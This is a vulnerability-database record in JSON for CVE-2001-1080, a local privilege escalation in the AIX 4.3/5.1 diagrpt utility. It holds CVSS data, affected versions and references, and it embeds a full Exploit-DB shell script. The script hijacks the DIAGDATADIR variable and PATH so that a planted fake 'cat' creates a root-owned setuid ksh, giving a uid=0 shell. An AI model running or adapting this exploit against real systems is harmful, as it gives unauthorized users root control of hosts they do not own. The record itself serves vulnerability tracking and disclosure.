{"id": "CVE-2001-1080", "bulletinFamily": "NVD", "title": "CVE-2001-1080", "description": "diagrpt in AIX 4.3.x and 5.1 uses the DIAGDATADIR environment variable to find and execute certain programs, which allows local users to gain privileges by modifying the variable to point to a Trojan horse program.", "published": "2001-06-19T04:00:00", "modified": "2017-10-10T01:29:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1080", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/6734", "http://www.securityfocus.com/bid/2916", "http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/MSS-OAR-E01-2001.225.1/$file/oar225.txt"], "cvelist": ["CVE-2001-1080"], "type": "cve", "lastseen": "2020-10-03T11:36:58", "edition": 3, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:1881"]}, {"type": "exploitdb", "idList": ["EDB-ID:20965"]}], "modified": "2020-10-03T11:36:58", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-10-03T11:36:58", "rev": 2}, "vulnersScore": 6.9}, "cpe": ["cpe:/o:ibm:aix:5.1", "cpe:/o:ibm:aix:4.3"], "affectedSoftware": [{"cpeName": "ibm:aix", "name": "ibm aix", "operator": "eq", "version": "5.1"}, {"cpeName": "ibm:aix", "name": "ibm aix", "operator": "eq", "version": "4.3"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": true, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:ibm:aix:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:ibm:aix:5.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}

{"exploitdb": [{"lastseen": "2016-02-02T15:22:45", "description": "AIX 4.3/5.1 diagrpt Arbitrary Privileged Program Execution Vulnerability. CVE-2001-1080. Local exploit for aix platform", "published": "2003-05-23T00:00:00", "type": "exploitdb", "title": "AIX 4.3/5.1 - diagrpt Arbitrary Privileged Program Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-1080"], "modified": "2003-05-23T00:00:00", "id": "EDB-ID:20965", "href": "https://www.exploit-db.com/exploits/20965/", "sourceData": "source: http://www.securityfocus.com/bid/2916/info\r\n\r\nAIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default.\r\n\r\nWhen 'diagrpt' executes, it relies on an environment variable to locate another utility which it executes. This utility is executed by 'diagrpt' as root.\r\n\r\nAn attacker can gain root privileges by having 'diagrpt' execute a malicious program of the same name in a directory under their control. \r\n\r\n#!/bin/sh\r\n# FileName: x_diagrpt.sh\r\n# Exploit diagrpt of Aix4.x & 5L to get a uid=0 shell.\r\n# Tested : on Aix4.3.3 & Aix5.1.\r\n# Author : watercloud@xfocus.org\r\n# Site : www.xfocus.org www.xfocus.net\r\n# Date : 2003-5-23\r\n# Announce: use as your owner risk!\r\n#\r\n# Note :\r\n# It does not work on all versions of tsm command.\r\n# Use this command to test if your version can exploit or not :\r\n# bash$ strings /usr/lpp/diagnostics/bin/diagrpt |grep cat\r\n# diagrpt.cat\r\n# cat %s <--- here ! have the bug !!! can exploit!\r\n#\r\n\r\nO_DIR=`/bin/pwd`\r\ncd /tmp ; mkdir .ex$$ ; cd .ex$$\r\nPATH=/tmp/.ex$$:$PATH ; export PATH\r\n/bin/cat >cat<<EOF\r\n#!/bin/ksh -p\r\ncp /bin/ksh ./kfsh\r\nchown root ./kfsh\r\nchmod 777 ./kfsh\r\nchmod u+s ./kfsh\r\nEOF\r\nchmod a+x cat\r\n\r\nDIAGDATADIR=/tmp/.ex$$ ; export DIAGDATADIR\r\ntouch /tmp/.ex$$/diagrpt1.dat\r\n\r\n/usr/lpp/diagnostics/bin/diagrpt -o 010101\r\nstty echo\r\nstty intr '^C' erase '^H' eof '^D' eol '^@'\r\n\r\nif [ -e ./kfsh ] ;then\r\n echo \"\"\r\n echo \"====================\"\r\n pwd\r\n ls -l ./kfsh\r\n echo \"Exploit ok ! Use this command to get a uid=0 shell :\"\r\n echo '/usr/bin/syscall setreuid 0 0 \\; execve \"/bin/sh\" '\r\n ./kfsh\r\nelse\r\n echo \"\"\r\n echo \"Exploit false !!!!\"\r\nfi\r\n\r\ncd /tmp ; /bin/rm -Rf /tmp/.ex$$ ;cd $O_DIR\r\n#EOF\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20965/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "cvelist": ["CVE-2001-1080"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 6734\n[CVE-2001-1080](https://vulners.com/cve/CVE-2001-1080)\nBugtraq ID: 2916\n", "modified": "2001-06-22T00:00:00", "published": "2001-06-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1881", "id": "OSVDB:1881", "type": "osvdb", "title": "AIX diagrpt Arbitrary Privileged Program Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}